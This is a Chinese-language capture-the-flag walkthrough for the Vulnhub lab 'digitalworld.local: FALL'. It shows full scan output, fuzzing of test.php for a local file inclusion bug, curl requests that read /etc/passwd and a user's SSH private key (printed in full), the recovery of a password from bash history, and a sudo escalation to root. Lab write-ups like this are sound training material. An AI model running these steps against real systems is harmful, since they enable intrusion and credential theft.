第304个Vulnhub靶场演练攻略:digital world.local：FALL

digital world.local：FALL Vulnhub 演练

FALL (digitalworld.local: FALL) 是 Donavan 为 Vulnhub 打造的一款中型机器。这款实验室非常适合经验丰富的 CTF 玩家，他们希望在这类环境中检验自己的技能。那么，让我们开始吧，看看如何将问题分解成易于管理的部分。

1.网络扫描

1.1 首先，netdiscover 无法确定受害 PC 的 IP 地址。当我们启动计算机时，屏幕上会显示其 IP 地址。

 Currently scanning: Finished!   |   Screen View: Unique Hosts              46646 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 2798760    _____________________________________________________________________________IP            At MAC Address     Count     Len  MAC Vendor / Hostname      -----------------------------------------------------------------------------192.168.74.1    00:50:56:c0:00:08  40563 2433780  VMware, Inc.             192.168.74.2    00:50:56:eb:d3:ae   4600  276000  VMware, Inc.             192.168.74.133  00:0c:29:bc:f0:36    908   54480  VMware, Inc.             192.168.74.254  00:50:56:ec:6c:1a    574   34440  VMware, Inc.             0.0.0.0         00:0c:29:bc:f0:36      1      60  VMware, Inc.             ┌──(root㉿kali)-[~]
└─# netdiscover -r 192.168.74.0/24

1.2 在我们的场景中，受害者 PC 的 IP 地址是192.168.74.133。为了推进此过程，我们启动了 Nmap。我们运行了一次激进扫描 ( -A ) 来枚举开放端口，并发现了以下端口，如下图所示。

根据nmap扫描的结果，这台机器正在运行各种各样的服务。

┌──(root㉿kali)-[~]
└─# nmap -A 192.168.74.133
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-29 11:12 EDT
Nmap scan report for 192.168.74.133
Host is up (0.00038s latency).
Not shown: 979 filtered tcp ports (no-response), 10 filtered tcp ports (host-prohibited)
PORT     STATE  SERVICE     VERSION
22/tcp   open   ssh         OpenSSH 7.8 (protocol 2.0)
| ssh-hostkey: 
|   2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA)
|   256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA)
|_  256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519)
80/tcp   open   http        Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Good Tech Inc's Fall Sales - Home
111/tcp  closed rpcbind
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
443/tcp  open   ssl/http    Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
|_http-title: Good Tech Inc's Fall Sales - Home
| tls-alpn: 
|_  http/1.1
| http-robots.txt: 1 disallowed entry 
|_/
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2019-08-15T03:51:33
|_Not valid after:  2020-08-19T05:31:33
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
445/tcp  open   netbios-ssn Samba smbd 4.8.10 (workgroup: SAMBA)
3306/tcp open   mysql       MySQL (unauthorized)
8000/tcp closed http-alt
8080/tcp closed http-proxy
8443/tcp closed https-alt
9090/tcp open   http        Cockpit web service 162 - 188
|_http-title: Did not follow redirect to https://192.168.74.133:9090/
MAC Address: 00:0C:29:BC:F0:36 (VMware)
Aggressive OS guesses: Linux 5.0 - 5.14 (98%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (98%), Linux 4.15 - 5.19 (94%), OpenWrt 21.02 (Linux 5.4) (94%), Linux 2.6.32 - 3.13 (93%), Linux 5.1 - 5.15 (93%), Linux 6.0 (93%), Linux 2.6.39 (93%), OpenWrt 22.03 (Linux 5.10) (93%), Linux 4.19 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: FALL; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 2h20m00s, deviation: 4h02m31s, median: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-05-29T15:12:42
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.8.10)
|   Computer name: fall
|   NetBIOS computer name: FALL\x00
|   Domain name: \x00
|   FQDN: fall
|_  System time: 2025-05-29T08:12:42-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms 192.168.74.133OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.65 seconds┌──(root㉿kali)-[~]
└─# 

2.枚举

2.1 首先，我们尝试使用 HTTP。我们来查看 80 端口，看看是否有任何值得注意的发现。我们可以立即在浏览器中验证这一点，因为 Apache 服务器正在监听 80 端口。除了我们发现一个用户名“ qiu ”之外，没有什么特别的发现。

2.2 现在，我们将尝试使用 gobuster，看看能否在这台机器上找到一些可以让我们继续前进的东西。它是一个用于暴力破解网站中的 URI（目录和文件）、DNS 子域（支持通配符）以及目标 Web 服务器上的虚拟主机名的程序。

gobuster dir -u http://192.168.74.133 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt
上述命令将枚举所有具有 .html、.php、.txt 扩展名的文件。

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.74.133 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.74.133
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 214]
/index.php            (Status: 200) [Size: 8385]
/modules              (Status: 301) [Size: 238] [--> http://192.168.74.133/modules/]                                                                      
/uploads              (Status: 301) [Size: 238] [--> http://192.168.74.133/uploads/]                                                                      
/doc                  (Status: 301) [Size: 234] [--> http://192.168.74.133/doc/]                                                                          
/admin                (Status: 301) [Size: 236] [--> http://192.168.74.133/admin/]                                                                        
/assets               (Status: 301) [Size: 237] [--> http://192.168.74.133/assets/]                                                                       
/test.php             (Status: 200) [Size: 80]
/lib                  (Status: 301) [Size: 234] [--> http://192.168.74.133/lib/]                                                                          
/config.php           (Status: 200) [Size: 0]
/robots.txt           (Status: 200) [Size: 79]
/error.html           (Status: 200) [Size: 80]
/tmp                  (Status: 301) [Size: 234] [--> http://192.168.74.133/tmp/]                                                                          
/missing.html         (Status: 200) [Size: 168]
/.html                (Status: 403) [Size: 214]
/phpinfo.php          (Status: 200) [Size: 17]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================┌──(root㉿kali)-[~]
└─# 

2.3 我们发现了一个值得信赖的目录 (test.php)。我立即打开浏览器查看。如上所述，当我们访问 /test.php 时，会收到一条警报。它声称缺少一个 GET 参数。因此，我们现在只有几种可能性。

3.渗透

3.1 由于我一无所知，所以对 LFI 产生了怀疑。于是我使用 FUZZ 对 /etc/passwd 文件进行模糊测试，以确认 LFI 的存在。借助以下命令，我尝试对缺少的 Get 参数进行模糊测试。

https://github.com/danielmiessler/SecLists/tree/master

┌──(kali㉿kali)-[~]
└─$ unzip SecLists.zip 
┌──(root㉿kali)-[~/304]
└─# ffuf -c -w /home/kali/SecLists/Discovery/Web-Content/common.txt -u 'http://192.168.74.133/test.php?FUZZ=/etc/passwd' -fs 80/'___\  /'___\           /'___\       /\ \__/ /\ \__/  __  __  /\ \__/       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      \ \_\   \ \_\  \ \____/  \ \_\       \/_/    \/_/   \/___/    \/_/       v2.1.0-dev
________________________________________________:: Method           : GET:: URL              : http://192.168.74.133/test.php?FUZZ=/etc/passwd:: Wordlist         : FUZZ: /home/kali/SecLists/Discovery/Web-Content/common.txt:: Follow redirects : false:: Calibration      : false:: Timeout          : 10:: Threads          : 40:: Matcher          : Response status: 200-299,301,302,307,401,403,405,500:: Filter           : Response size: 80
________________________________________________file                    [Status: 200, Size: 1633, Words: 36, Lines: 33, Duration: 1ms]
:: Progress: [4746/4746] :: Job [1/1] :: 3636 req/sec :: Duration: [0:00:01] :: Errors: 0 ::┌──(root㉿kali)-[~/304]
└─# 

3.2 对于可能缺少术语的“file”参数，我们得到了 200 OK。我们使用 curl 命令调出远程计算机的 /etc/passwd 文件。

┌──(root㉿kali)-[~/304]
└─# curl http://192.168.74.133/test.php?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
systemd-coredump:x:999:996:systemd Core Dumper:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:995:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
cockpit-ws:x:997:993:User for cockpit-ws:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
chrony:x:996:991::/var/lib/chrony:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
qiu:x:1000:1000:qiu:/home/qiu:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
nginx:x:995:990:Nginx web server:/var/lib/nginx:/sbin/nologin
tss:x:59:59:Account used by the tpm2-abrmd package to sandbox the tpm2-abrmd daemon:/dev/null:/sbin/nologin
clevis:x:994:989:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false┌──(root㉿kali)-[~/304]
└─# 

3.3 我们不难看出，用户名“ qiu ”拥有更高权限的用户账户，并且还拥有bash授权。

现在是时候开始 LFI 漏洞利用了。在探索目录之后，我们利用 LFI，借助 curl 命令枚举了用户qiu的 ssh id_rsa 密钥。

┌──(root㉿kali)-[~/304]
└─# curl http://192.168.74.133/test.php?file=/home/qiu/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAvNjhOFOSeDHy9K5vnHSs3qTjWNehAPzT0sD3beBPVvYKQJt0AkD0
FDcWTSSF13NhbjCQm5fnzR8td4sjJMYiAl+vAKboHne0njGkBwdy5PgmcXyeZTECIGkggX
61kImUOIqtLMcjF5ti+09RGiWeSmfIDtTCjj/+uQlokUMtdc4NOv4XGJbp7GdEWBZevien
qXoXtG6j7gUgtXX1Fxlx3FPhxE3lxw/AfZ9ib21JGlOyy8cflTlogrZPoICCXIV/kxGK0d
Zucw8rGGMc6Jv7npeQS1IXU9VnP3LWlOGFU0j+IS5SiNksRfdQ4mCN9SYhAm9mAKcZW8wS
vXuDjWOLEwAAA9AS5tRmEubUZgAAAAdzc2gtcnNhAAABAQC82OE4U5J4MfL0rm+cdKzepO
NY16EA/NPSwPdt4E9W9gpAm3QCQPQUNxZNJIXXc2FuMJCbl+fNHy13iyMkxiICX68Apuge
d7SeMaQHB3Lk+CZxfJ5lMQIgaSCBfrWQiZQ4iq0sxyMXm2L7T1EaJZ5KZ8gO1MKOP/65CW
iRQy11zg06/hcYlunsZ0RYFl6+J6epehe0bqPuBSC1dfUXGXHcU+HETeXHD8B9n2JvbUka
U7LLxx+VOWiCtk+ggIJchX+TEYrR1m5zDysYYxzom/uel5BLUhdT1Wc/ctaU4YVTSP4hLl
KI2SxF91DiYI31JiECb2YApxlbzBK9e4ONY4sTAAAAAwEAAQAAAQArXIEaNdZD0vQ+Sm9G
NWQcGzA4jgph96uLkNM/X2nYRdZEz2zrt45TtfJg9CnnNo8AhhYuI8sNxkLiWAhRwUy9zs
qYE7rohAPs7ukC1CsFeBUbqcmU4pPibUERes6lyXFHKlBpH7BnEz6/BY9RuaGG5B2DikbB
8t/CDO79q7ccfTZs+gOVRX4PW641+cZxo5/gL3GcdJwDY4ggPwbU/m8sYsyN1NWJ8NH00d
X8THaQAEXAO6TTzPMLgwJi+0kj1UTg+D+nONfh7xeXLseST0m1p+e9C/8rseZsSJSxoXKk
CmDy69aModcpW+ZXl9NcjEwrMvJPLLKjhIUcIhNjf4ABAAAAgEr3ZKUuJquBNFPhEUgUic
ivHoZH6U82VyEY2Bz24qevcVz2IcAXLBLIp+f1oiwYUVMIuWQDw6LSon8S72kk7VWiDrWz
lHjRfpUwWdzdWSMY6PI7EpGVVs0qmRC/TTqOIH+FXA66cFx3X4uOCjkzT0/Es0uNyZ07qQ
58cGE8cKrLAAAAgQDlPajDRVfDWgOWJj+imXfpGsmo81UDaYXwklzw4VM2SfIHIAFZPaA0
acm4/icKGPlnYWsvZCksvlUck+ti+J2RS2Mq9jmKB0AVZisFazj8qIde3SPPwtR7gBR329
JW3Db+KISMRIvdpJv+eiKQLg/epbSdwXZi0DJoB0a15FsIAQAAAIEA0uQl0d0p3NxCyT/+
Q6N+llf9TB5+VNjinaGu4DY6qVrSHmhkceHtXxG6h9upRtKw5BvOlSbTatlfMZYUtlZ1mL
RWCU8D7v1Qn7qMflx4bldYgV8lf18sb6g/uztWJuLpFe3Ue/MLgeJ+2TiAw9yYoPVySNK8
uhSHa0dvveoJ8xMAAAAZcWl1QGxvY2FsaG9zdC5sb2NhbGRvbWFpbgEC
-----END OPENSSH PRIVATE KEY-----

3.4 让我们尝试 SSH 连接，但首先，我们必须将此密钥保存在我们的机器上，并授予必要的权限。那么，让我们开始 SSH 登录……

成功登录SSH后，我们开始提升权限。

┌──(root㉿kali)-[~/304]
└─# nano sshkey304┌──(root㉿kali)-[~/304]
└─# ls
sshkey304┌──(root㉿kali)-[~/304]
└─# chmod 600 sshkey304                                           ┌──(root㉿kali)-[~/304]
└─# ssh -i sshkey304 qiu@192.168.74.133
The authenticity of host '192.168.74.133 (192.168.74.133)' can't be established.
ED25519 key fingerprint is SHA256:EKK1u2kbhexzA1ZV6xNgdbmDeKiF8lfhmk+8sHl47DY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.74.133' (ED25519) to the list of known hosts.
Web console: https://FALL:9090/ or https://192.168.74.133:9090/Last login: Sun Sep  5 19:28:51 2021
[qiu@FALL ~]$ ls -al
total 24
drwxr-xr-x. 3 qiu  qiu  128 May 21  2021 .
drwxr-xr-x. 3 root root  17 Aug 14  2019 ..
-rw-------  1 qiu  qiu  292 Sep  5  2021 .bash_history
-rw-r--r--. 1 qiu  qiu   18 Mar 15  2018 .bash_logout
-rw-r--r--. 1 qiu  qiu  193 Mar 15  2018 .bash_profile
-rw-r--r--. 1 qiu  qiu  231 Mar 15  2018 .bashrc
-rw-r--r--  1 qiu  qiu   27 May 21  2021 local.txt
-rw-rw-r--  1 qiu  qiu   38 May 21  2021 reminder
drwxr-xr-x  2 qiu  qiu   61 May 21  2021 .ssh

3.5 权限提升

我们现在要做的就是检查 bash 历史记录并找到一些有价值的信息。

我们获得了用户“ qiu ”和密码“ remarkablyawesome ”，并运行了sudo命令来检查该用户的权限。

sudo -l
用户“qiu”已被授予成为root用户所需的所有权限。我们只需切换用户帐户并提交上面列出的密码即可。

万岁！现在我们有了根目录，我们必须导航到根目录才能获取根标志。

[qiu@FALL ~]$ cat .bash_history
ls -al
cat .bash_history 
rm .bash_history
echo "remarkablyawesomE" | sudo -S dnf update
ifconfig
ping www.google.com
ps -aux
ps -ef | grep apache
env
env > env.txt
rm env.txt
lsof -i tcp:445
lsof -i tcp:80
ps -ef
lsof -p 1930
lsof -p 2160
rm .bash_history
exit
ls -al
cat .bash_history
exit
[qiu@FALL ~]$ 
[qiu@FALL ~]$ sudo -l
[sudo] password for qiu: 
Matching Defaults entries for qiu on FALL:!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENTLC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser qiu may run the following commands on FALL:(ALL) ALL
[qiu@FALL ~]$ sudo su
[root@FALL qiu]# cd /root
[root@FALL ~]# cat proof.txt 
Congrats on a root shell! :-)
[root@FALL ~]# 

这就是我们深入机器核心的方法。这是一次非常棒的练习，而且大家一起加油也很有趣。为了理解各种场景，有必要尝试一下。